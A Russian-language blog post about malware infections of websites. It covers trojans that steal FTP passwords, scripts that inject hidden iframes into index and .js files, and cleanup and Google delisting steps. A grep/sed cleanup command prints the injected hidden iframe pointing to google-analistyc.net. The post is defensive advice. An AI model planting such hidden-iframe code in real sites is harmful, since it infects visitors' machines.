Стоит отметить, сразу, что это бич не только Рунета, но и всей Сети. Но за последние пару месяцев я наблюдаю просто дикий рост количества подобных сайтов именно в Рунете.
За последние пару месяцев ко мне обратилось более десятка людей, у которых появились проблемы такого рода на их сайтах. Всем помог, все довольны, но у людей это сожрало деньги, время, нервы и позиции в поисковых системах.
Что такое “вирусы на сайте”? Как правило, это банальный фрейм, который либо накручивает показы какой-нибудь порно-странички,или, что чаще, пытается подгрузить через дыры в браузерах копию трояна для вашей операционной системы.
В основном, это вирусы семейства Downloader.JS.*.
Трояны же могут выполнять самые разнообразные функции, от воровства различных электронных кошельков и средств на них, до воровства паролей к ftp и ssh от хостингов, для заражения новых сайтов.
Пароли, как бы они хорошо не шифровались, можно вытащить практически из любой программы, к примеру из Far Commander или Mozilla Firefox вытащить их проще некуда. И список таких программ достаточно обширен, по факту – все популярные браузеры и ftp-клиенты.
Вытащенные пароли от ftp троян отправляет на сервер-матку, которая их определённым образом обрабатывает, и ставит в очередь на заражение. Звучит немного бредово, но на самом деле это до смешного просто реализовать. Единственная сложность, которую я вижу прямо сейчас – это обеспечить большую скорость работы вредоносного скрипта.
Эти самые скрипты, логинясь на фтп, проходятся по всем каталогам рекурсивно, внедряя свой код в определённые файлы. Как правило их можно назвать двумя масками: index.* и *.js. Обычно эти скрипты внедряют код разными способами, к примеру обычный фрейм, или вызов удалённого JS, который рисует тот-же самый фрейм. Способов достаточно много.
(кликабельно)
Часто зловредный код маскируется под популярные сервисы, к примеру под Аналитику от Google или счётчик от LiveInternet.
Если с прямой угрозой заражения компьютера мы, как грамотные пользователи, справится можем, то с угрозой самим сайтам справится сложнее.
Во-первых, с момента заражения ваш сайт, а то и сайты – это разносчик заразы, и если ваша аудитория девушки-школьницы – то есть большой шанс того, что заражённых машин будет довольно много.
Во-вторых, все современные браузеры блокирует заражённые сайты, основываясь на статистике от специализированных поисковых роботов Google. Выглядит это как на картинке сверху. Естественно, что к вашему Е-магазину, сайту-визитке или просто к блогу – отношение будет резко негативное. Клиента или читателя так потерять недолго.
В-третьих, если заражённый сайт достаточно долго висит без устранения зловредного кода, он начинает скатываться с позиций в поисковых системах. Точно скатывается в Яндексе и в Google. По поводу остальных – я не уверен. Плюс, в выдачи Google напротив заражённого сайта стоит пометка, мол опасен сайт, остерегайтесь.
Так же часто падение идёт и по вину владельца сайта, так как многие перекрывают через htaccess индексный файл какой-нибудь страничкой, с лаконичным “Технические работы”. Но в данном случае, лучше временно потерять позиции, чем позволить сайту и дальше заражать людей, в то время, пока вы исправляете последствия заражения.
Кстати, вот что говорит Google на предмет страницы google-analistyc.net:
(кликабельно)
В итоге, от заразы можно избавится, по сути, двумя способами. К примеру, если ваши сайты включают в себя зловредный код, который ведёт на google-analistyc.net, то вам поможет вот такой код:
grep -R google-analistyc.net . | awk ‘{print $1}’ | cut -d “:” -f 1 | xargs -n1 sed -i ” ‘s|<\!– ~ –><iframe src=\”http:\/\/google-analistyc.net\/in.cgi?12\” width=\”0\” height=\”0\” style=\”display:none\”><\/iframe><\!– ~ –>||g’
Соответственно, если вы обнаружили, что видов зловредного кода два-три – то вот таким нехитрым способом можно вычистить достаточно быстро.
Второй способ – это руками. Иногда мне приходилось править файлы руками, потому что весь зловредный код был абсолютно разным, и я не смог написать под него регулярное выражение.
После того, как вы удалите весь зловредный код, внимательно следите за тем, что подгружается на страницу, к примеру с помощью firebug для firefox. Возможно, вы что-то пропустили.
Ну а про смену паролей на ftp, я и вовсе, промолчу – думаю вы сами дагадались, что его-то менять надо в первую очередь.
Для того, что бы избавится от красного ярма на сайте (см. первую картинку), необходимо будет провернуть пару незамысловатых мероприятий и подождать примерно около недели. Хотя русская поддержка Google бьёт себя пяткой в грудь и настаивает, что меньше месяца ну никак не выйдет. Выходит, и только в путь.
Всё просто, вам необходимо зайти в панель Вебмастера Google (а если её нет, то зарегистрироваться и провалидировать сайт), и отправить заявку на рассмотрение. Рассматривает разумеется роботами, потому почистить надо хорошо. Если при рассмотрении, о котором вы сами и попросили, ваш сайт снова будет признан опасным, время его “обеления” резко увеличивается.
Получилось много, и немного сумбурно, если будут конкретные вопросы, а не сумбурные, как например “Как удалить вирус с сайта” (за ответы на такие вопросы я беру денег), то смело задавайте их в комментариях. Постараюсь помочь.
Сергей Токарев
Спасибо за информацию. Сам, к счастью, с этим не сталкивался, или просто ещё не знаю, что столкнулся, но если что, то хоть буду знать, где концы искать